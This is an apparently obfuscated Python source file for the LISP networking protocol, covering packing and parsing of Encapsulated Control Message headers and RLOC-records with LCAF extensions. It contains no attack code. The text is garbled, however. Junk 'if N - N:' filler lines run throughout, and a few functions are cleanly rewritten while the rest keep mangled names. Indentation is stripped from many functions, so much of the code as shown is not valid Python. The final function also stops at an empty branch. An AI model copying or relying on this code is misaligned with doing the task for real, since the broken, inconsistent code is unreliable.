  if 61 - 61: I11i / OOooOOo
  if 85 - 85: OoOoOO00 - I11i . OoOoOO00 . OoOoOO00
  if 62 - 62: IiII % OoooooooOO * OoO0O00 + OoO0O00 % Ii1I % iII111i
  # First 32-bit word: ECM type nibble plus flag bits.
  ooo0OOoo = ( LISP_ECM << 28 )
  if ( self . security ) : ooo0OOoo |= 0x08000000
  if ( self . ddt ) : ooo0OOoo |= 0x04000000
  if ( self . to_etr ) : ooo0OOoo |= 0x02000000
  if ( self . to_ms ) : ooo0OOoo |= 0x01000000
  if 66 - 66: I1IiiI . OOooOOo - OoO0O00 % Oo0Ooo * o0oOOo0O0Ooo - oO0o
  O0ooOOo0 = struct . pack ( "I" , socket . htonl ( ooo0OOoo ) )
  if 32 - 32: O0 + I1Ii111
  Ooo0oO = ""
  if ( self . afi == LISP_AFI_IPV4 ) :
   # 0x45 = IPv4, 5-word header; header checksum computed below.
   Ooo0oO = struct . pack ( "BBHHHBBH" , 0x45 , 0 , socket . htons ( self . length ) ,
    0 , 0 , self . ttl , self . protocol , socket . htons ( self . ip_checksum ) )
   Ooo0oO += self . source . pack_address ( )
   Ooo0oO += self . dest . pack_address ( )
   Ooo0oO = lisp_ip_checksum ( Ooo0oO )
  if 11 - 11: i1IIi
  if ( self . afi == LISP_AFI_IPV6 ) :
   # 0x60 = IPv6 version nibble; the IPv6 header has no checksum.
   Ooo0oO = struct . pack ( "BBHHBB" , 0x60 , 0 , 0 , socket . htons ( self . length ) ,
    self . protocol , self . ttl )
   Ooo0oO += self . source . pack_address ( )
   Ooo0oO += self . dest . pack_address ( )
  if 65 - 65: OoO0O00 . ooOoO0o
  if 12 - 12: I1Ii111 + O0 - oO0o . IiII
  # Inner UDP header, all fields in network byte order.
  IiII1iiI = socket . htons ( self . udp_sport )
  OooOOOoOoo0O0 = socket . htons ( self . udp_dport )
  I1111III111ii = socket . htons ( self . udp_length )
  Ooo0OO00oo = socket . htons ( self . udp_checksum )
  o0oOo00 = struct . pack ( "HHHH" , IiII1iiI , OooOOOoOoo0O0 , I1111III111ii , Ooo0OO00oo )
  return ( O0ooOOo0 + Ooo0oO + o0oOo00 )
if 46 - 46: IiII . ooOoO0o / iII111i
if 63 - 63: II111iiii - I1ii11iIi11i * II111iiii
def decode ( self , packet ) :
#
# Decode an Encapsulated Control Message: the 4-byte ECM header, then
# the inner IPv4 or IPv6 header, then the inner UDP header. Each parsed
# field is stored on self. Returns the remaining bytes (the encapsulated
# control message) or None whenever the buffer is too short.
#
if 92 - 92: OoO0O00 % ooOoO0o * O0 % iIii1I11I1II1 / i1IIi / OoOoOO00
if 67 - 67: I1Ii111 + I11i + I1Ii111 . OOooOOo % o0oOOo0O0Ooo / ooOoO0o
if 78 - 78: I1ii11iIi11i . O0
if 56 - 56: oO0o - i1IIi * O0 / I11i * I1IiiI . I11i
# First 32-bit word: ECM type nibble plus the S/D/E/M flag bits.
O00oO00oOO00O = "I"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 54 - 54: i11iIiiIii % i1IIi + Oo0Ooo / OoOoOO00
ooo0OOoo = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
if 26 - 26: I11i . I1ii11iIi11i
ooo0OOoo = socket . ntohl ( ooo0OOoo [ 0 ] )
# Flag bits mirror the ones set in encode(): security, DDT, to-ETR, to-MS.
self . security = True if ( ooo0OOoo & 0x08000000 ) else False
self . ddt = True if ( ooo0OOoo & 0x04000000 ) else False
self . to_etr = True if ( ooo0OOoo & 0x02000000 ) else False
self . to_ms = True if ( ooo0OOoo & 0x01000000 ) else False
packet = packet [ ooOoooOoo0oO : : ]
if 55 - 55: OoOoOO00 * I1Ii111 % OoO0O00 - OoO0O00
if 34 - 34: O0 * OoO0O00 - oO0o - IiII * Ii1I . II111iiii
if 28 - 28: O0 % iII111i - i1IIi
if 49 - 49: ooOoO0o . I11i - iIii1I11I1II1
# Peek at the IP version nibble of the inner header to pick v4 vs v6.
if ( len ( packet ) < 1 ) : return ( None )
IiiI1Ii1II = struct . unpack ( "B" , packet [ 0 : 1 ] ) [ 0 ]
IiiI1Ii1II = IiiI1Ii1II >> 4
if 41 - 41: ooOoO0o * i11iIiiIii % ooOoO0o . oO0o
# Inner IPv4 header (fixed 20 bytes; unpacked in three chunks, the
# first two H/I reads land in a throwaway variable).
if ( IiiI1Ii1II == 4 ) :
ooOoooOoo0oO = struct . calcsize ( "HHIBBH" )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 97 - 97: oO0o - iII111i + IiII . OoOoOO00 + iIii1I11I1II1
O0o000 , I1111III111ii , O0o000 , Ii1i11iIi1iII , III1I1Iii1 , Ooo0OO00oo = struct . unpack ( "HHIBBH" , packet [ : ooOoooOoo0oO ] )
self . length = socket . ntohs ( I1111III111ii )
self . ttl = Ii1i11iIi1iII
self . protocol = III1I1Iii1
self . ip_checksum = socket . ntohs ( Ooo0OO00oo )
self . source . afi = self . dest . afi = LISP_AFI_IPV4
if 23 - 23: I11i + IiII . oO0o
if 33 - 33: OoO0O00 / i11iIiiIii / i1IIi . IiII
if 7 - 7: Oo0Ooo + IiII
if 15 - 15: iIii1I11I1II1 % OoOoOO00 + i1IIi . Ii1I - Oo0Ooo
# Zero out the header-checksum field inside the buffer copy (the
# received value was saved above) — presumably so the checksum can be
# recomputed/verified over a zeroed field later; confirm against callers.
III1I1Iii1 = struct . pack ( "H" , 0 )
oOOoo0O00 = struct . calcsize ( "HHIBB" )
i111 = struct . calcsize ( "H" )
packet = packet [ : oOOoo0O00 ] + III1I1Iii1 + packet [ oOOoo0O00 + i111 : ]
if 33 - 33: I1IiiI % I11i . I1Ii111 / Ii1I * II111iiii * o0oOOo0O0Ooo
packet = packet [ ooOoooOoo0oO : : ]
packet = self . source . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = self . dest . unpack_address ( packet )
if ( packet == None ) : return ( None )
if 49 - 49: i1IIi * i11iIiiIii
if 47 - 47: II111iiii / Oo0Ooo
# Inner IPv6 header (first 8 fixed bytes, then the two 16-byte addresses).
if ( IiiI1Ii1II == 6 ) :
ooOoooOoo0oO = struct . calcsize ( "IHBB" )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 38 - 38: OOooOOo . iII111i / O0 . Ii1I / OoOoOO00
O0o000 , I1111III111ii , III1I1Iii1 , Ii1i11iIi1iII = struct . unpack ( "IHBB" , packet [ : ooOoooOoo0oO ] )
self . length = socket . ntohs ( I1111III111ii )
self . protocol = III1I1Iii1
self . ttl = Ii1i11iIi1iII
self . source . afi = self . dest . afi = LISP_AFI_IPV6
if 52 - 52: O0 / i11iIiiIii * I1IiiI . i1IIi
packet = packet [ ooOoooOoo0oO : : ]
packet = self . source . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = self . dest . unpack_address ( packet )
if ( packet == None ) : return ( None )
if 50 - 50: OoooooooOO . iII111i % o0oOOo0O0Ooo
if 6 - 6: ooOoO0o - i1IIi . O0 . i1IIi . OoOoOO00
self . source . mask_len = self . source . host_mask_len ( )
self . dest . mask_len = self . dest . host_mask_len ( )
if 42 - 42: i11iIiiIii * O0 % i11iIiiIii + OOooOOo
# Inner UDP header: source port, dest port, length, checksum.
ooOoooOoo0oO = struct . calcsize ( "HHHH" )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 64 - 64: I1IiiI / OoOoOO00
IiII1iiI , OooOOOoOoo0O0 , I1111III111ii , Ooo0OO00oo = struct . unpack ( "HHHH" , packet [ : ooOoooOoo0oO ] )
self . udp_sport = socket . ntohs ( IiII1iiI )
self . udp_dport = socket . ntohs ( OooOOOoOoo0O0 )
self . udp_length = socket . ntohs ( I1111III111ii )
self . udp_checksum = socket . ntohs ( Ooo0OO00oo )
packet = packet [ ooOoooOoo0oO : : ]
return ( packet )
if 6 - 6: i11iIiiIii - iII111i * i1IIi - iII111i
if 8 - 8: I11i / i11iIiiIii . O0 / OoO0O00 * oO0o + I1Ii111
if 91 - 91: I1IiiI
if 84 - 84: O0 % Ii1I
if 3 - 3: I1IiiI . I11i / I1ii11iIi11i
if 2 - 2: IiII + I11i / iIii1I11I1II1 . i11iIiiIii . i1IIi * ooOoO0o
if 14 - 14: Oo0Ooo . O0 - oO0o - i11iIiiIii
if 8 - 8: I1IiiI / iIii1I11I1II1 / OoooooooOO / Oo0Ooo / ooOoO0o
if 80 - 80: I11i
if 26 - 26: II111iiii + I1IiiI . II111iiii - oO0o % OoO0O00
if 1 - 1: OoO0O00 - II111iiii
if 75 - 75: Oo0Ooo - OoOoOO00 + oO0o % i1IIi * OOooOOo
if 56 - 56: OoOoOO00 / OoO0O00 / I1IiiI % OoooooooOO
if 39 - 39: I1IiiI + II111iiii * Oo0Ooo % Ii1I . o0oOOo0O0Ooo * oO0o
if 42 - 42: Ii1I / Oo0Ooo
if 25 - 25: OoooooooOO % Ii1I * I1Ii111 * I11i + I1IiiI % I1ii11iIi11i
if 70 - 70: Ii1I + I1ii11iIi11i * I11i * i1IIi . I1Ii111
if 76 - 76: OoooooooOO * OoOoOO00 . OoooooooOO
if 46 - 46: ooOoO0o * o0oOOo0O0Ooo % II111iiii / I1Ii111
if 29 - 29: OoO0O00 - i11iIiiIii % Oo0Ooo % o0oOOo0O0Ooo
if 30 - 30: oO0o - Ii1I % Ii1I
if 8 - 8: IiII
if 68 - 68: IiII . OoooooooOO - i11iIiiIii + i11iIiiIii
if 81 - 81: OoOoOO00 + iII111i . i11iIiiIii
if 10 - 10: OoOoOO00 + I11i - iIii1I11I1II1 - I11i
if 58 - 58: ooOoO0o
if 98 - 98: Ii1I / OoO0O00 % OoooooooOO
if 65 - 65: ooOoO0o % Oo0Ooo - I1IiiI % I1Ii111 + iIii1I11I1II1 / iIii1I11I1II1
if 94 - 94: IiII - Oo0Ooo . o0oOOo0O0Ooo - ooOoO0o - oO0o . I11i
if 39 - 39: oO0o + OoOoOO00
if 68 - 68: i1IIi * oO0o / i11iIiiIii
if 96 - 96: I1IiiI
if 78 - 78: OoO0O00
if 72 - 72: I1ii11iIi11i / O0 % II111iiii / II111iiii
if 48 - 48: OOooOOo % OOooOOo / iIii1I11I1II1 - i11iIiiIii
if 57 - 57: I11i / IiII * i1IIi + II111iiii . o0oOOo0O0Ooo
if 11 - 11: II111iiii
if 66 - 66: Ii1I - I1IiiI . OoooooooOO * I1Ii111
if 16 - 16: IiII * OoO0O00 * i11iIiiIii - ooOoO0o
if 88 - 88: iIii1I11I1II1 / Ii1I * IiII / I1Ii111
if 31 - 31: O0 . I1IiiI
if 8 - 8: OoOoOO00
if 99 - 99: iII111i
if 93 - 93: I1Ii111
if 39 - 39: Ii1I
if 10 - 10: OoOoOO00 . iIii1I11I1II1 / I1ii11iIi11i % iII111i / i11iIiiIii
if 14 - 14: i11iIiiIii % o0oOOo0O0Ooo * O0 % iIii1I11I1II1 . IiII - II111iiii
if 14 - 14: Ii1I % ooOoO0o - OoOoOO00
if 52 - 52: OoO0O00 / i1IIi - Ii1I
if 8 - 8: oO0o + ooOoO0o . I1ii11iIi11i . i1IIi / I1IiiI . IiII
if 8 - 8: i1IIi * O0
if 60 - 60: Oo0Ooo - II111iiii + I1IiiI
if 17 - 17: OoOoOO00 % I1IiiI
if 8 - 8: Oo0Ooo
if 49 - 49: OoOoOO00 * I11i - o0oOOo0O0Ooo / OoO0O00 * oO0o
if 51 - 51: ooOoO0o - iIii1I11I1II1 . I11i * OoOoOO00 + I1Ii111 * i1IIi
if 37 - 37: IiII * oO0o / OoooooooOO . OoO0O00
if 77 - 77: II111iiii + OoOoOO00 * OOooOOo
if 9 - 9: II111iiii - i11iIiiIii * o0oOOo0O0Ooo % OoO0O00 * i11iIiiIii / I11i
if 45 - 45: i11iIiiIii * iII111i - I1ii11iIi11i + ooOoO0o % iII111i
if 11 - 11: iIii1I11I1II1
if 48 - 48: iIii1I11I1II1 - Oo0Ooo
if 80 - 80: i1IIi
if 56 - 56: II111iiii - o0oOOo0O0Ooo
if 48 - 48: Oo0Ooo - I1ii11iIi11i - II111iiii . Ii1I . oO0o / iIii1I11I1II1
if 38 - 38: I1Ii111 % i11iIiiIii + Ii1I * ooOoO0o / I1Ii111
if 93 - 93: oO0o
if 60 - 60: I1Ii111 . oO0o / Oo0Ooo * ooOoO0o + OoOoOO00 - i1IIi
if 13 - 13: i11iIiiIii * oO0o / I11i * I1IiiI
if 31 - 31: iIii1I11I1II1 * Ii1I % OOooOOo . II111iiii
if 56 - 56: IiII / i11iIiiIii . o0oOOo0O0Ooo . oO0o - i11iIiiIii
if 23 - 23: I1ii11iIi11i * i11iIiiIii % ooOoO0o
if 47 - 47: iIii1I11I1II1 . OOooOOo / I11i % II111iiii
if 92 - 92: I1ii11iIi11i % i11iIiiIii
if 82 - 82: I1Ii111 * I1ii11iIi11i % Ii1I / o0oOOo0O0Ooo
if 28 - 28: iII111i % OoO0O00 - OOooOOo - Oo0Ooo
if 16 - 16: i11iIiiIii - i11iIiiIii . OoOoOO00 / i1IIi
if 76 - 76: O0 * OoO0O00 / O0
if 23 - 23: I1ii11iIi11i . iIii1I11I1II1 - i11iIiiIii / II111iiii
if 48 - 48: oO0o - II111iiii * I1IiiI
if 78 - 78: I1IiiI * i11iIiiIii * II111iiii
if 19 - 19: OoooooooOO * i11iIiiIii / O0 . I1IiiI % I11i
if 35 - 35: iIii1I11I1II1 + I1IiiI - ooOoO0o / Oo0Ooo * I1ii11iIi11i * Oo0Ooo
if 17 - 17: OoOoOO00
if 24 - 24: iIii1I11I1II1 / OOooOOo % OoooooooOO / O0 / oO0o
if 93 - 93: Oo0Ooo
if 5 - 5: iII111i
if 61 - 61: OOooOOo * OoO0O00 - O0
if 30 - 30: iIii1I11I1II1
if 14 - 14: o0oOOo0O0Ooo + Ii1I
if 91 - 91: OoooooooOO / oO0o + OoOoOO00
if 100 - 100: i1IIi
if 13 - 13: i1IIi . I1ii11iIi11i * o0oOOo0O0Ooo
if 31 - 31: i11iIiiIii % OoO0O00 . i11iIiiIii % oO0o - i1IIi
if 62 - 62: oO0o + oO0o . OoooooooOO
if 59 - 59: iIii1I11I1II1 . Oo0Ooo * I11i
if 29 - 29: Oo0Ooo - I1IiiI * I11i
if 58 - 58: i1IIi * Ii1I / ooOoO0o % iIii1I11I1II1
if 24 - 24: OoOoOO00 - o0oOOo0O0Ooo * I1IiiI . I11i / OoO0O00 * Ii1I
if 12 - 12: OoooooooOO % oO0o
if 92 - 92: ooOoO0o % OoO0O00 + O0 + OoOoOO00 / OoO0O00 * iIii1I11I1II1
if 79 - 79: O0
if 71 - 71: OoO0O00 - O0
if 73 - 73: iIii1I11I1II1
if 7 - 7: OoOoOO00
if 55 - 55: oO0o . OoO0O00 + iIii1I11I1II1 + OoOoOO00 / I1ii11iIi11i - O0
if 14 - 14: II111iiii - OoO0O00 - O0 * OoooooooOO / I1IiiI
if 3 - 3: I11i
if 46 - 46: I1ii11iIi11i * I1Ii111 - iIii1I11I1II1
if 25 - 25: II111iiii / OOooOOo + Oo0Ooo - iIii1I11I1II1 - OoOoOO00
if 97 - 97: OOooOOo . OOooOOo / I1ii11iIi11i + I1IiiI * i1IIi
if 53 - 53: O0
if 28 - 28: iII111i % OoO0O00 . OoO0O00 / IiII * Oo0Ooo * iII111i
if 49 - 49: I1IiiI / I1Ii111 * iII111i + I1IiiI % oO0o % ooOoO0o
if 27 - 27: OoO0O00 / iII111i . I1ii11iIi11i
if 71 - 71: OoO0O00 . i11iIiiIii . iIii1I11I1II1 + I1IiiI - o0oOOo0O0Ooo
if 34 - 34: iII111i
class lisp_rloc_record():
    """One RLOC-record as carried in LISP control messages.

    Holds the locator's priorities/weights, the L/P/R flag bits, the
    locator address itself, and the optional LCAF-carried extras
    (geo, ELP, RLE, JSON, security keys, distinguished name).
    """

    def __init__(self):
        # Unicast and multicast priority/weight fields.
        self.priority = 0
        self.mpriority = 0
        self.weight = 0
        self.mweight = 0
        # Local / probe / reachability flag bits.
        self.local_bit = False
        self.probe_bit = False
        self.reach_bit = False
        # Locator address, initially AFI-less.
        self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        # Optional LCAF extras; all absent until decoded/configured.
        self.rloc_name = None
        self.geo = None
        self.elp = None
        self.rle = None
        self.json = None
        self.keys = None
if 6 - 6: OoO0O00 . OoOoOO00 + I1ii11iIi11i
if 24 - 24: OoO0O00 . Ii1I
def print_rloc_name(self, cour=False):
    """Return 'rloc-name: <name>' (blue, optionally courier) or "" if unnamed."""
    if (self.rloc_name == None): return ("")
    shown = lisp_print_cour(self.rloc_name) if cour else self.rloc_name
    return ("rloc-name: {}".format(blue(shown, cour)))
if 86 - 86: I11i % I1Ii111 . I11i * IiII + IiII + II111iiii
if 66 - 66: oO0o / O0 - OoOoOO00
def print_record(self, indent):
    """Log one line describing this RLOC-record: flags, priorities,
    AFI, address, and any LCAF extras (geo/elp/rle/json/keys)."""
    name_str = self.print_rloc_name()
    if (name_str != ""): name_str = ", " + name_str

    geo_str = ""
    if (self.geo):
        label = "'{}' ".format(self.geo.geo_name) if self.geo.geo_name else ""
        geo_str = ", geo: {}{}".format(label, self.geo.print_geo())

    elp_str = ""
    if (self.elp):
        label = "'{}' ".format(self.elp.elp_name) if self.elp.elp_name else ""
        elp_str = ", elp: {}{}".format(label, self.elp.print_elp(True))

    rle_str = ""
    if (self.rle):
        label = "'{}' ".format(self.rle.rle_name) if self.rle.rle_name else ""
        rle_str = ", rle: {}{}".format(label, self.rle.print_rle(False, True))

    json_str = ""
    if (self.json):
        # NOTE(review): the original computed a json_name label here but
        # never included it in the output; output kept identical.
        json_str = ", json: {}".format(self.json.print_json(False))

    keys_str = ""
    if (self.rloc.is_null() == False and self.keys and self.keys[1]):
        keys_str = ", " + self.keys[1].print_keys()

    line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
        + "{}{}{}{}{}{}{}")
    lprint(line.format(indent, self.print_flags(), self.priority,
        self.weight, self.mpriority, self.mweight, self.rloc.afi,
        red(self.rloc.print_address_no_iid(), False), name_str, geo_str,
        elp_str, rle_str, json_str, keys_str))
if 89 - 89: OoO0O00 - OOooOOo - i1IIi - OoO0O00 % iIii1I11I1II1
if 52 - 52: o0oOOo0O0Ooo * O0 + I1ii11iIi11i
def print_flags ( self ) :
return ( "{}{}{}" . format ( "L" if self . local_bit else "l" , "P" if self . probe_bit else "p" , "R" if self . reach_bit else "r" ) )
if 83 - 83: I11i + OOooOOo - OoooooooOO
if 7 - 7: IiII % ooOoO0o / OoooooooOO / o0oOOo0O0Ooo + OoO0O00 - OoO0O00
if 15 - 15: i1IIi + OOooOOo / Ii1I
def store_rloc_entry(self, rloc_entry):
    """Populate this record from a configured rloc_entry: address
    (preferring the NAT-translated one), name, LCAF extras, and the
    four priority/weight values."""
    if (rloc_entry.translated_rloc.is_null()):
        addr = rloc_entry.rloc
    else:
        addr = rloc_entry.translated_rloc
    self.rloc.copy_address(addr)

    if (rloc_entry.rloc_name):
        self.rloc_name = rloc_entry.rloc_name

    # For each extra, take the parsed object when present; otherwise
    # resolve its configured name through the matching global table.
    if (rloc_entry.geo):
        self.geo = rloc_entry.geo
    else:
        name = rloc_entry.geo_name
        if (name and name in lisp_geo_list):
            self.geo = lisp_geo_list[name]

    if (rloc_entry.elp):
        self.elp = rloc_entry.elp
    else:
        name = rloc_entry.elp_name
        if (name and name in lisp_elp_list):
            self.elp = lisp_elp_list[name]

    if (rloc_entry.rle):
        self.rle = rloc_entry.rle
    else:
        name = rloc_entry.rle_name
        if (name and name in lisp_rle_list):
            self.rle = lisp_rle_list[name]

    if (rloc_entry.json):
        self.json = rloc_entry.json
    else:
        name = rloc_entry.json_name
        if (name and name in lisp_json_list):
            self.json = lisp_json_list[name]

    self.priority = rloc_entry.priority
    self.weight = rloc_entry.weight
    self.mpriority = rloc_entry.mpriority
    self.mweight = rloc_entry.mweight
if 29 - 29: OOooOOo
if 69 - 69: oO0o % OoooooooOO * iII111i
def encode_lcaf ( self ) :
#
# Build the LCAF (LISP Canonical Address Format) encoding of this
# RLOC-record: an outer AFI-list LCAF wrapping the locator address,
# optionally followed by name, geo, ELP, RLE, security-key and JSON
# sub-LCAFs. Returns the packed byte string.
#
o0O000Ooo = socket . htons ( LISP_AFI_LCAF )
# Geo-coordinate sub-LCAF, encoded by the geo object itself.
OOoooooO = ""
if ( self . geo ) :
OOoooooO = self . geo . encode_geo ( )
if 65 - 65: I1Ii111
if 33 - 33: O0 . I1Ii111 % i11iIiiIii + OoO0O00 . I1ii11iIi11i
# Explicit Locator Path: one (flags, afi, address) triple per hop.
O0O00ooO0O0O = ""
if ( self . elp ) :
Iiii1II = ""
for Ooo0o0OoOO in self . elp . elp_nodes :
O000oOOoOOO = socket . htons ( Ooo0o0OoOO . address . afi )
ooOOooooo0Oo = 0
if ( Ooo0o0OoOO . eid ) : ooOOooooo0Oo |= 0x4
if ( Ooo0o0OoOO . probe ) : ooOOooooo0Oo |= 0x2
if ( Ooo0o0OoOO . strict ) : ooOOooooo0Oo |= 0x1
ooOOooooo0Oo = socket . htons ( ooOOooooo0Oo )
Iiii1II += struct . pack ( "HH" , ooOOooooo0Oo , O000oOOoOOO )
Iiii1II += Ooo0o0OoOO . address . pack_address ( )
if 15 - 15: o0oOOo0O0Ooo / IiII / ooOoO0o * OoOoOO00
if 13 - 13: iII111i
OoOoo00oO = socket . htons ( len ( Iiii1II ) )
O0O00ooO0O0O = struct . pack ( "HBBBBH" , o0O000Ooo , 0 , 0 , LISP_LCAF_ELP_TYPE ,
0 , OoOoo00oO )
O0O00ooO0O0O += Iiii1II
if 56 - 56: iIii1I11I1II1 / OoO0O00 * OOooOOo
if 73 - 73: OoooooooOO % IiII / I1Ii111 * I11i + i1IIi % i11iIiiIii
# Replication List Entry: per-node level + address, plus an optional
# AFI=name entry carrying a NUL-terminated rloc-name.
ooOOi1IiI1i1iI1Ii = ""
if ( self . rle ) :
O00O = ""
for iIIII1iiIII in self . rle . rle_nodes :
O000oOOoOOO = socket . htons ( iIIII1iiIII . address . afi )
O00O += struct . pack ( "HBBH" , 0 , 0 , iIIII1iiIII . level , O000oOOoOOO )
O00O += iIIII1iiIII . address . pack_address ( )
if ( iIIII1iiIII . rloc_name ) :
O00O += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
O00O += iIIII1iiIII . rloc_name + "\0"
if 99 - 99: OoOoOO00 / II111iiii % i11iIiiIii + I11i + O0
if 83 - 83: I1IiiI . i1IIi - i1IIi % OoO0O00 * oO0o * oO0o
if 30 - 30: I1ii11iIi11i
OOo = socket . htons ( len ( O00O ) )
ooOOi1IiI1i1iI1Ii = struct . pack ( "HBBBBH" , o0O000Ooo , 0 , 0 , LISP_LCAF_RLE_TYPE ,
0 , OOo )
ooOOi1IiI1i1iI1Ii += O00O
if 100 - 100: i11iIiiIii + OoO0O00 % OoOoOO00 + o0oOOo0O0Ooo * OoOoOO00
if 87 - 87: o0oOOo0O0Ooo
# JSON sub-LCAF: length fields, the JSON string, then a zero AFI.
oOOOOoO00o0oo = ""
if ( self . json ) :
iiii1 = socket . htons ( len ( self . json . json_string ) + 2 )
oo0ooOO = socket . htons ( len ( self . json . json_string ) )
oOOOOoO00o0oo = struct . pack ( "HBBBBHH" , o0O000Ooo , 0 , 0 , LISP_LCAF_JSON_TYPE ,
0 , iiii1 , oo0ooOO )
oOOOOoO00o0oo += self . json . json_string
oOOOOoO00o0oo += struct . pack ( "H" , 0 )
if 43 - 43: OOooOOo - OOooOOo . OoooooooOO
if 65 - 65: Oo0Ooo
# Security sub-LCAF: delegated to the stored key object (keys[1]).
oO000ooO = ""
if ( self . rloc . is_null ( ) == False and self . keys and self . keys [ 1 ] ) :
oO000ooO = self . keys [ 1 ] . encode_lcaf ( self . rloc )
if 81 - 81: I1IiiI . OoOoOO00 - I1IiiI . oO0o
if 50 - 50: OoooooooOO - I1ii11iIi11i
# Distinguished-name entry: AFI=name then NUL-terminated string.
O000o = ""
if ( self . rloc_name ) :
O000o += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
O000o += self . rloc_name + "\0"
if 78 - 78: I1Ii111
if 39 - 39: I1ii11iIi11i - iIii1I11I1II1 * ooOoO0o
# Total payload length for the outer AFI-list header: all sub-LCAFs
# plus 2 (the locator's AFI field) plus the locator address bytes.
OoOoo0 = len ( OOoooooO ) + len ( O0O00ooO0O0O ) + len ( ooOOi1IiI1i1iI1Ii ) + len ( oO000ooO ) + 2 + len ( oOOOOoO00o0oo ) + self . rloc . addr_length ( ) + len ( O000o )
if 53 - 53: IiII
OoOoo0 = socket . htons ( OoOoo0 )
iii1i1I1II = struct . pack ( "HBBBBHH" , o0O000Ooo , 0 , 0 , LISP_LCAF_AFI_LIST_TYPE ,
0 , OoOoo0 , socket . htons ( self . rloc . afi ) )
iii1i1I1II += self . rloc . pack_address ( )
return ( iii1i1I1II + O000o + OOoooooO + O0O00ooO0O0O + ooOOi1IiI1i1iI1Ii + oO000ooO + oOOOOoO00o0oo )
if 5 - 5: iIii1I11I1II1 . OoooooooOO
if 13 - 13: oO0o . o0oOOo0O0Ooo . i11iIiiIii * I1ii11iIi11i / ooOoO0o
def encode ( self ) :
ooOOooooo0Oo = 0
if ( self . local_bit ) : ooOOooooo0Oo |= 0x0004
if ( self . probe_bit ) : ooOOooooo0Oo |= 0x0002
if ( self . reach_bit ) : ooOOooooo0Oo |= 0x0001
if 41 - 41: ooOoO0o + IiII . i1IIi + iIii1I11I1II1
IIii1i = struct . pack ( "BBBBHH" , self . priority , self . weight ,
self . mpriority , self . mweight , socket . htons ( ooOOooooo0Oo ) ,
socket . htons ( self . rloc . afi ) )
if 57 - 57: i11iIiiIii * oO0o * i11iIiiIii
if ( self . geo or self . elp or self . rle or self . keys or self . rloc_name or self . json ) :
if 14 - 14: Oo0Ooo / I11i
IIii1i = IIii1i [ 0 : - 2 ] + self . encode_lcaf ( )
else :
IIii1i += self . rloc . pack_address ( )
if 14 - 14: Oo0Ooo - Ii1I + ooOoO0o - I1IiiI % IiII
return ( IIii1i )
if 70 - 70: I1IiiI % ooOoO0o * OoO0O00 + OoOoOO00 % i11iIiiIii
if 39 - 39: Oo0Ooo % I1Ii111 / I1IiiI / Oo0Ooo . o0oOOo0O0Ooo + o0oOOo0O0Ooo
def decode_lcaf ( self , packet , nonce ) :
#
# Decode one LCAF-encoded locator from packet, dispatching on the LCAF
# type: AFI-list, geo-coord, JSON, ELP, RLE, or security. Stores the
# decoded pieces on self and returns the remaining bytes, or None on
# any length underrun.
#
# Common LCAF header: AFI(=LCAF), two reserved/flags bytes, type byte,
# one more byte (passed through to decode_geo below), 16-bit length.
O00oO00oOO00O = "HBBBBH"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 83 - 83: OoooooooOO * II111iiii % OoooooooOO
O000oOOoOOO , i111IiI1III1 , ooOOooooo0Oo , O000oo0O0OO0 , I1iii1IiI11I11I , iiii1 = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
if 30 - 30: I1Ii111 / o0oOOo0O0Ooo + OoooooooOO + OoOoOO00 + OoO0O00
if 40 - 40: OoooooooOO / IiII
iiii1 = socket . ntohs ( iiii1 )
packet = packet [ ooOoooOoo0oO : : ]
if ( iiii1 > len ( packet ) ) : return ( None )
if 82 - 82: i11iIiiIii - oO0o - i1IIi
if 78 - 78: oO0o % iII111i / i1IIi / ooOoO0o
if 44 - 44: o0oOOo0O0Ooo + Ii1I + I1IiiI % O0
if 100 - 100: OoooooooOO
# AFI-list: iterate entries for the declared length; each entry is a
# nested LCAF, a distinguished name, or a plain AFI+address.
if ( O000oo0O0OO0 == LISP_LCAF_AFI_LIST_TYPE ) :
while ( iiii1 > 0 ) :
O00oO00oOO00O = "H"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( iiii1 < ooOoooOoo0oO ) : return ( None )
if 27 - 27: i11iIiiIii % II111iiii + I1Ii111
# Remember length before this entry so consumed bytes can be
# subtracted from the remaining LCAF length afterwards.
o00OO00OOo0 = len ( packet )
O000oOOoOOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
O000oOOoOOO = socket . ntohs ( O000oOOoOOO )
if 76 - 76: OOooOOo - I1Ii111 + iIii1I11I1II1 + I1IiiI * oO0o
if ( O000oOOoOOO == LISP_AFI_LCAF ) :
packet = self . decode_lcaf ( packet , nonce )
if ( packet == None ) : return ( None )
else :
packet = packet [ ooOoooOoo0oO : : ]
self . rloc_name = None
if ( O000oOOoOOO == LISP_AFI_NAME ) :
packet , IiIi1I1i1iII = lisp_decode_dist_name ( packet )
self . rloc_name = IiIi1I1i1iII
else :
self . rloc . afi = O000oOOoOOO
packet = self . rloc . unpack_address ( packet )
if ( packet == None ) : return ( None )
self . rloc . mask_len = self . rloc . host_mask_len ( )
if 93 - 93: i11iIiiIii * i11iIiiIii - I1IiiI + iIii1I11I1II1 * i11iIiiIii
if 14 - 14: ooOoO0o . OoooooooOO . I1IiiI - IiII + iIii1I11I1II1
if 47 - 47: OOooOOo % i1IIi
iiii1 -= o00OO00OOo0 - len ( packet )
if 23 - 23: Ii1I * Ii1I / I11i
if 11 - 11: OOooOOo
# Geo-coordinates: delegated to lisp_geo (5th header byte passed in).
elif ( O000oo0O0OO0 == LISP_LCAF_GEO_COORD_TYPE ) :
if 58 - 58: OoO0O00 * OoooooooOO
if 47 - 47: iII111i - Oo0Ooo
if 19 - 19: O0 . i1IIi + I11i / II111iiii + ooOoO0o
